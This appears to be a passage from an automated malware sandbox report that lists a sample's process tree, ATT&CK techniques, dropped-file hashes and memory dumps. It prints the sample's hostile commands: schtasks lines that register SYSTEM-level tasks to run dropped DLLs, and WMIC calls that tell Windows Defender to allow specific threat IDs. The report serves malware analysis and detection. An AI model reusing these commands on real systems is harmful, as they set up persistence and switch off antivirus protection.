schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qDCCGhOyU\JIIhnD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "pMLebdOaFqOcGSU" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3744

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "pMLebdOaFqOcGSU2" /F /xml "C:\Program Files (x86)\qDCCGhOyU\oLPvrug.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4064

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "pMLebdOaFqOcGSU"
2⤵
PID:500

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "pMLebdOaFqOcGSU"
2⤵
PID:4080

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GxGlmfAoAweICH" /F /xml "C:\Program Files (x86)\mrDIPifxyaTU2\CbkfmaP.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2476

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "slRbLmmYRnIKV2" /F /xml "C:\ProgramData\xoWQddOigjsPCTVB\HlNOJjB.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2172

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "WVYoPtOsxUeUNTEuA2" /F /xml "C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\IyiBhgN.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:2552

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YTzAZVCfIyFjXTYUhLc2" /F /xml "C:\Program Files (x86)\piLDiRqvGTKTC\ZCKbTfW.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1820

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bAvepIylLlkyPpwct" /SC once /ST 08:47:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ONbcuvmDOvHMWTXn\QtsmGuGR\zUTOGVK.dll\",#1 /site_id 767" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1448

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "bAvepIylLlkyPpwct"
2⤵
PID:960

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "spuwHFScZqBO" /SC once /ST 08:22:55 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\kBuzAYGF\WzycSsL.exe\" pR /S"
2⤵
- Creates scheduled task(s)
PID:1516

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "spuwHFScZqBO"
2⤵
PID:2404

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "spuwHFScZqBO"
2⤵
PID:4068

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "spuwHFScZqBO"
2⤵
PID:4016

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "lJLWniCkwZbjhapzm"
2⤵
PID:640

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ONbcuvmDOvHMWTXn\QtsmGuGR\zUTOGVK.dll",#1 /site_id 767
1⤵
PID:3236

C:\Windows\SysWOW64\rundll32.exe
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ONbcuvmDOvHMWTXn\QtsmGuGR\zUTOGVK.dll",#1 /site_id 767
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2916

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bAvepIylLlkyPpwct"
3⤵
PID:1088

C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\kBuzAYGF\WzycSsL.exe
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\kBuzAYGF\WzycSsL.exe pR /S
1⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:3680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:2744

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3140

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:3460

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:4048

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3648

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:2748

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3996

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:2368

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Browser Extensions

T1176

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\kuGFoFUJyZFbBZdRkpR\IyiBhgN.xml
MD5
9f3820d6e88465dfe64fa6b7e6b19624

SHA1
540b54aac520f3b2802aa728164fdbd75b40a8ac

SHA256
e5997582e537f1addebdf2ce183d419d7fdc353843aa53c816a993db808aaf2d

SHA512
e2a7206833173c025115117527ca05ab71068f03390124d473a1aa1fe64e0f5a81c8ed14bcd95b55212b6fc0c2b06c06017d1a130c35326d37f6cf0bac94103c

Download Submit
C:\Program Files (x86)\mrDIPifxyaTU2\CbkfmaP.xml
MD5
8834890abc19df91d52640b0301146de

SHA1
4f264646be3278ceac82135fc9d0248ecf2e560a

SHA256
1fd5dd7d8b21b76738c7bfbd2c5d884bf451ce36ef13c1125f85db5f41ebbf74

SHA512
87fc2793a905ca77c09b69bb5191d5eb0a7c31fd6775bd1b54afe83e21aae3c849e4d27faf4a7e542cb1993ab079cc9735a15774d0e89904c833d0424082dcbd

Download Submit
C:\Program Files (x86)\piLDiRqvGTKTC\ZCKbTfW.xml
MD5
2e559e979c0512a3e7f2d2b97fc99831

SHA1
8620fbe4425de2d53bb1316f2c9fe677d548ba94

SHA256
0658cd7c3cf7a5efa9029eedbea2eb2605ca06ea415b2f8a7b0135e0390968f7

SHA512
72cfea89b88d5d5df234455efb03ec010c8151d83cef2ab9320d975f7fe2158d4def7b96bcd648009fc98ebe21a619481eb164d2b1107953b1a891476e6acc0f

Download Submit
C:\Program Files (x86)\qDCCGhOyU\oLPvrug.xml
MD5
9ea9e76fd72144d6914a9c35a635a47a

SHA1
34a410a3849c6fb61daae64a2bd662f6f499beb9

SHA256
a8df1f4bf329d223026dd4453dbbed4347d71116e627b4646f4188157072ce7a

SHA512
438d53ea1692028949e47f19942d20d5818eedb922e1ffb6c9d78776a0477cad4126da6fad6e9b30905be7b7619801cccc9719e9bfdab7aca183047d86e3960f

Download Submit
C:\ProgramData\xoWQddOigjsPCTVB\HlNOJjB.xml
MD5
e0da1a256b9ee3d0e3a710efd95ddc2a

SHA1
84f50468fab91798dd75158c8db0dfb1ffe6776f

SHA256
950d18bc12a510de2358fb5b54a09699a4f6e24bbe3541a7a3373a5b9b77ae7f

SHA512
e547ec3318bf900fec5b8efaee8fcfcce2e1f067848ee47b5647763d7e8b75bc2d58d1a0a77f9c4e7ae18c5d7d7ec4f6544c4b45b5f88e7affb921ceeb85e980

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
MD5
f6c90ab0db80c6c3ea92556fda7273c7

SHA1
01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

SHA256
a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

SHA512
aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
e33ed3d4cc9b2e5a08ae25747ef47620

SHA1
e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7

SHA256
0e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f

SHA512
9e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
dc73d04bf3e7249e93897951c104a873

SHA1
3ef611c4b0d38e1a016fcb6c6e767054c95d16ac

SHA256
660f56bdb1a94a0968e761892c471c3777f55ff54dd75f44db05f472c01a05f2

SHA512
22e27c948134a1f46f75f9fd070a420e672861895d0d566ce0c717dc8a80fef5772abab597c807e3435726dec0a16a4a7cd47840067ea83bf8f2215f5efb8957

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ada6ae2f79935db80c8ce7fdb2cae6b4

SHA1
2c2bf95e33e9604fab940be3ab557f8966228246

SHA256
20d2af6fe4fddb7827d74654ffc36061928a27f8663aef8aaeea622f998378c5

SHA512
5432ff8575b6b9f6a389fb4ee0b7de1800244c7e1044dbcfdb27e55ac8ef6ca36154739e97e96fea5003d227685bf7d7f0ea50684253da96d2075e3d3d1f60fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
da9b7ec6adf0f1a9d3335700800c01e7

SHA1
f67accaf027786728bc3b285f21dccfaf58226f5

SHA256
e59c7eb57ca1ef80222be6f72dfebf5b2695a6d9194997ec06bcecaae4beb5fa

SHA512
c2fd2fe62bfa255bd9aa1a4eb27b2de10ed728fa1a5bb975ce8b744abe702bb537ab4a867dc378b833da8dcff0eeeafb2fed0e9fb5c2fd2e2c19fe1de74642e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4dbe9266c72d18b4aeaf32d751dadffd

SHA1
f8262d3c1f0afcaae8747c6e7df0ed1604965d31

SHA256
b25c41ed972b2782c891484fec22e52532554278aa87c720c2a30a88b2fb8ac5

SHA512
9220c673b0cbe157bb4a526376c02f0996a82b5fc177093e911a6f206f2fc2f31265c879d6cfdc5c86cfeacf600b6322ef61d0bc655b0bc1554236004c749e1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c300a38eee2786a777819f2afd274fa1

SHA1
0764af5f0112fbf8d3c11780428b2e9707548e9a

SHA256
bf5a4414f39a5d9239db93b72e4604959628a39036ef067b5f9e87b00ac89362

SHA512
327978adc0320a2489c5f7d52a78e4021e7f6226f5343f8646e2c7d279da3a44622bdd92b00469dab1cd75c2bf6fd16d5925c98194d200d1da458e2d8922a9b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2c7d012df12b9324da97059f18a5d7bc

SHA1
d38c17214c069475df14372a97aa1b903a43de71

SHA256
769f2800df2ad2dadc5b25e6436c371c25dc52835db6157671c21468f10a83a8

SHA512
a3d63972d9eb13540e436bb1a8aa05aa86481fbe7663b8d858755a16c9ec14a6a7c6f41ee24987de05efb451f1745b5a19ef72232c3c3f85b1471d999ef75ae2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
3a54ba36d28f78e22f8fe4dc69bd1af3

SHA1
230ca6622ee14537f2ce1c3c12447568d3d164f2

SHA256
eafbd22d03d588130139fa26a43c3b5ec343db8bcc7fe5a5f4d566742d3e351c

SHA512
fe6a0692aa277031531bb958553d08ff8f68495eeba0260cc0b5f0146c44ee869ce39dff1ef1998a29e0e0545f1e24bcaa9c6345bdce9965fbc561c0919d158d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8042.tmp\SimplInst.exe
MD5
8267a9266e949eb19b46ee649b707396

SHA1
eba2833c61319ab0177ed0623598b88b660dcfa0

SHA256
a218c9c2c7f24fe180d0626f134f2af248581eefaf8e18a0e688c338ae0b32dd

SHA512
ac52995304e0c8859ab8f04c8b2a20343cb7e007936ffc26ae27ab5f891cb7459e0c475630f04dc8b9aa1e90b120ffc027529343ddde0f2d496d5f2bac19e96b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8042.tmp\SimplInst.exe
MD5
8267a9266e949eb19b46ee649b707396

SHA1
eba2833c61319ab0177ed0623598b88b660dcfa0

SHA256
a218c9c2c7f24fe180d0626f134f2af248581eefaf8e18a0e688c338ae0b32dd

SHA512
ac52995304e0c8859ab8f04c8b2a20343cb7e007936ffc26ae27ab5f891cb7459e0c475630f04dc8b9aa1e90b120ffc027529343ddde0f2d496d5f2bac19e96b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS818A.tmp\SimplInst.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS818A.tmp\SimplInst.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\vjwjlbb.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\JPAWcIpLIGBPzJZ\vjwjlbb.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\kBuzAYGF\WzycSsL.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Users\Admin\AppData\Local\Temp\GGBXTQIHvxONXPngM\kBuzAYGF\WzycSsL.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
0f5cbdca905beb13bebdcf43fb0716bd

SHA1
9e136131389fde83297267faf6c651d420671b3f

SHA256
a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060

SHA512
a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d0aeefc32e3aaceed038c8a061e705df

SHA1
dfbb1f94ca0fea62ccffa16dcdc2efb146e66b1c

SHA256
7e6c48bff900cac7840aee1e076030ba0c21f6c6d4cf0e787ba3446a6c530e02

SHA512
50a5dc5df704aff66609d991b70c0d5f7abc215b1b07845aaa8e482c0b5b7e55ad46960bbef52e55f7024fe79954f29c315a0fb1203cd4f2ce6cf0a03d11396f

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
54b671623e358cca0942ae324b1d9f40

SHA1
8f6dc8f274b9f829ac8ce6b2209b4e097b395148

SHA256
5766b550d2a7ec54ff5713d9258620c3e44a1eb098585c74122781239d5a35db

SHA512
e8390968d909a23391cb829cca401e0c951e295ed91dbe825a2c70b880399c2fb0a73ba9c468b5e3a16c96edc144e48f5f8a994c14e4ddcc518d4579ba86cec9

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
af259c65bf0f208e9183ab0748f6c50c

SHA1
51ca9ba6cb3b9e34cb118ad0e6017324c78217d9

SHA256
70be11c22e8c73cd777fd3c790918edeee16ec1a4a5606ea1bc7d39d8cec3e5e

SHA512
cc872491fedc157b70e1890235015b0d9c4fe897062e122d1de42a8d6cc33f3a45d368df6a8bb2161974885537e633d9697e6de56a7ea112dcf9e699c1bd855a

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d34f0fc853ced05dba5b24751431483e

SHA1
8d5e1d3c51e72de4fb1485509215667e7aab7dae

SHA256
dc51051c22d6875ff08668c820d73c3fecba19a4aa8c7b7175556e73f86e5b13

SHA512
8232ad068d335ae4eb9bd569134dc0116693edffc22231f5e50682599d45e9f0430018c507f91f38a35302c5697ea06504673d287db96ee5be78078edd42b076

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
845a177dd55368dfebf7fc471951e4bc

SHA1
9f04983f39ed4045e52f782c8d21235569aa6678

SHA256
22131a49c955efce3934afc6b2c4414c727375251b4828cbf0d44768d22a22f5

SHA512
263329f6a4d82c8371ed247aba2a449f6f09ecf4d93f4ee43f0beb022593d8347982d04f5c1d9441c572eea65a6d3efcfa3e08656baac9c14770194c0c652ad6

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f15f1640ba3389241a493527d7ffd4aa

SHA1
0638e7286345ba25ed7550d993139272502c19e9

SHA256
5addd2acc82ec0d1817bc083bf61037c4cd70f746d73e8ed5a9bbcb51b25f49a

SHA512
38be5808aa2cf5778282ac5d93df641b0b25afe77a60615cb0ab9704581e88899d9fa82fd1b216ae18181780e9ad72e3565a242ae8af3b7d28a19621246e48e2

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e253ab1da058dd541bc174732fcf1514

SHA1
3608e4c928116cfcc9f1fe5bb2c8452a0657a176

SHA256
14f5d678c03fc9388b4c3d578d46bb917cfa024d301673667435712170793382

SHA512
081b724f31263f5bf5d8b0e16d8040b9462bde4a8cdd1af9fccfc800ee2f72d1b67badd54c3e4237259de35fb23c92196aa69a2be54e07c487bb2494bd8a345d

Download Submit
C:\Windows\Temp\ONbcuvmDOvHMWTXn\QtsmGuGR\zUTOGVK.dll
MD5
12367bde3d20adad5f332b34d9978e69

SHA1
237ec35b6db524b2dcdb8924ba51ce459b8f7c70

SHA256
b007dc0e6b616557c1fb0e8450a2c92696eb479d251b372f88cee8115ae6237d

SHA512
cfdea160eb346af8101fb5e84696b677af78e4ddcba2b110a0a71e5ea96adcfbe512824a27d82a3434d2597685548f66b7082b0a53816e251c2b9a899fb58d17

Download Submit
C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\HgCFJXi.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Windows\Temp\ONbcuvmDOvHMWTXn\cMoyCgwrTdLTZce\HgCFJXi.exe
MD5
876c45fb55e585c136c27b2556aa49c8

SHA1
fb13ee7fdcc827c03a2cbbd1c42ca878ac12a9d3

SHA256
ae3a2fabb2ab690afb232fc095cecd5cd0a13f1402e254e19692c20e2d9fbba7

SHA512
ed926b449fb41307178f82f92ed02fb5603372851b6e9367af93355626819b4f59b4dcb2ba0758db428100e516d9769ce8abd40d30afa766378ec3159a898062

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini
MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Windows\Temp\ONbcuvmDOvHMWTXn\QtsmGuGR\zUTOGVK.dll
MD5
12367bde3d20adad5f332b34d9978e69

SHA1
237ec35b6db524b2dcdb8924ba51ce459b8f7c70

SHA256
b007dc0e6b616557c1fb0e8450a2c92696eb479d251b372f88cee8115ae6237d

SHA512
cfdea160eb346af8101fb5e84696b677af78e4ddcba2b110a0a71e5ea96adcfbe512824a27d82a3434d2597685548f66b7082b0a53816e251c2b9a899fb58d17

Download Submit
memory/204-277-0x0000000000000000-mapping.dmp

Download
memory/636-278-0x0000000000000000-mapping.dmp

Download
memory/640-305-0x0000000005500000-0x0000000005501000-memory.dmp

Filesize
4KB

Download
memory/640-306-0x0000000005502000-0x0000000005503000-memory.dmp

Filesize
4KB

Download
memory/640-309-0x0000000005503000-0x0000000005504000-memory.dmp

Filesize
4KB

Download
memory/640-310-0x0000000005504000-0x0000000005506000-memory.dmp

Filesize
8KB

Download
memory/732-219-0x0000000000000000-mapping.dmp

Download
memory/960-161-0x0000000000000000-mapping.dmp

Download
memory/960-267-0x0000000000000000-mapping.dmp

Download
memory/976-120-0x0000000000000000-mapping.dmp

Download
memory/976-253-0x0000000000000000-mapping.dmp

Download
memory/1020-233-0x0000000000000000-mapping.dmp

Download
memory/1088-244-0x0000000000000000-mapping.dmp

Download
memory/1108-114-0x0000000000000000-mapping.dmp

Download
memory/1272-257-0x0000000003203000-0x0000000003204000-memory.dmp

Filesize
4KB

Download
memory/1272-246-0x0000000000000000-mapping.dmp

Download
memory/1272-258-0x0000000003204000-0x0000000003206000-memory.dmp

Filesize
8KB

Download
memory/1272-251-0x0000000003202000-0x0000000003203000-memory.dmp

Filesize
4KB

Download
memory/1272-250-0x0000000003200000-0x0000000003201000-memory.dmp

Filesize
4KB

Download
memory/1292-273-0x0000000000000000-mapping.dmp

Download
memory/1452-266-0x0000000000000000-mapping.dmp

Download
memory/1512-263-0x0000000000000000-mapping.dmp

Download
memory/1512-190-0x0000000000000000-mapping.dmp

Download
memory/1516-234-0x0000000000000000-mapping.dmp

Download
memory/1516-270-0x0000000000000000-mapping.dmp

Download
memory/1564-183-0x0000000000000000-mapping.dmp

Download
memory/1640-312-0x0000000000F32000-0x0000000000F33000-memory.dmp

Filesize
4KB

Download
memory/1640-314-0x0000000000F34000-0x0000000000F36000-memory.dmp

Filesize
8KB

Download
memory/1640-313-0x0000000000F33000-0x0000000000F34000-memory.dmp

Filesize
4KB

Download
memory/1640-311-0x0000000000F30000-0x0000000000F31000-memory.dmp

Filesize
4KB

Download
memory/1784-240-0x0000000005E44000-0x0000000005E46000-memory.dmp

Filesize
8KB

Download
memory/1784-222-0x0000000000000000-mapping.dmp

Download
memory/1784-230-0x0000000006DA0000-0x0000000006DA1000-memory.dmp

Filesize
4KB

Download
memory/1784-232-0x0000000005E42000-0x0000000005E43000-memory.dmp

Filesize
4KB

Download
memory/1784-231-0x0000000005E40000-0x0000000005E41000-memory.dmp

Filesize
4KB

Download
memory/1784-239-0x0000000005E43000-0x0000000005E44000-memory.dmp

Filesize
4KB

Download
memory/1808-186-0x0000000000000000-mapping.dmp

Download
memory/1820-287-0x0000000000000000-mapping.dmp

Download
memory/1840-181-0x00000000081F0000-0x00000000081F1000-memory.dmp

Filesize
4KB

Download
memory/1840-188-0x00000000069C3000-0x00000000069C4000-memory.dmp

Filesize
4KB

Download
memory/1840-189-0x00000000069C4000-0x00000000069C6000-memory.dmp

Filesize
8KB

Download
memory/1840-179-0x00000000069C2000-0x00000000069C3000-memory.dmp

Filesize
4KB

Download
memory/1840-178-0x00000000069C0000-0x00000000069C1000-memory.dmp

Filesize
4KB

Download
memory/1840-173-0x0000000007A80000-0x0000000007A81000-memory.dmp

Filesize
4KB

Download
memory/1840-163-0x0000000000000000-mapping.dmp

Download
